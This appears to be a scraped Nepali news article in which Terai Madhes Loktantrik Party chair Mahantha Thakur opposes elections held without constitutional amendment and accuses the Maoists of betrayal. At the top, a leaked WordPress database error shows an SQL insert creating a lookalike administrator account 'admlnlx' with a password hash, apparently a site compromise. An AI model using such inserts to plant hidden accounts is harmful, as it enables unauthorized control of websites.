WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXnGXYpRQ2xX72amIJ5ECCwheng9.L0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:15:48', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १३ –
तराई मधेस लोकतान्त्रिक पार्टीका अध्यक्ष महन्थ ठाकुरले सरकारले जवरजस्ती चुनाव गराउन खोजको भन्दै चुनावको विरोध गरेका छन् ।
तराई मधेस लोकतान्त्रिक पार्टीको ९ औं वार्षिक उत्सको अवसमा विजुली बजारमा आयोजित कार्यक्रममा अध्यक्ष ठाकूरले संविधान संशोधनलाई वेवस्ता गरेर चुनावमा गए आफूहरुलाई स्विकार्य नहुने बताएका हुन् । ठाकुरले तीन दलमा केही फरक नभएको उल्लेख गरे ।
उनले सरकाले आफूहरुसँग गरेको सम्झौता कार्यान्वयन नगरेको आरोप लगाए । सरकारले मधेसका मुद्दा फिर्ता लिन्छु भनेको भएपनि अझैसम्म फिर्ता नलिएको बताए ।
माओवादी प्रति आक्रामक
ठाकुरले सरकारको नेतृत्व गरेको दल नेकपा माओवादी मधेसलाई धोका दिन थालेको आरोप लगाए । उनले मधेस गएका बेला माओवादी मधेस चाहिन्छ, मधेस होइन आफू माइती आएको छु भन्छ तर सरकारमा पुगेपछि मधेसीलाई धोका दिएको आरोप लगाए ।
माओवादी मधेसको मागमा लचक भएको आफ२हरुले ठानेको भए पनि कांग्रेस एमालेकै बाटोमा आएको ठाकुरको आरोप थियो । उनले प्रचण्ड संशोधनबाट चुनाव तर्फ केन्द्रीत भएको आरोप लगाए ।
यसअघि हिजो बालुवाटारमा बसेको मोर्चा सत्तागठबन्धको बैठकमा मोर्चाका नेताले संविधान संशोधन पारित नभएसम्म चुनाव हुन नदिने बताएका थिए ।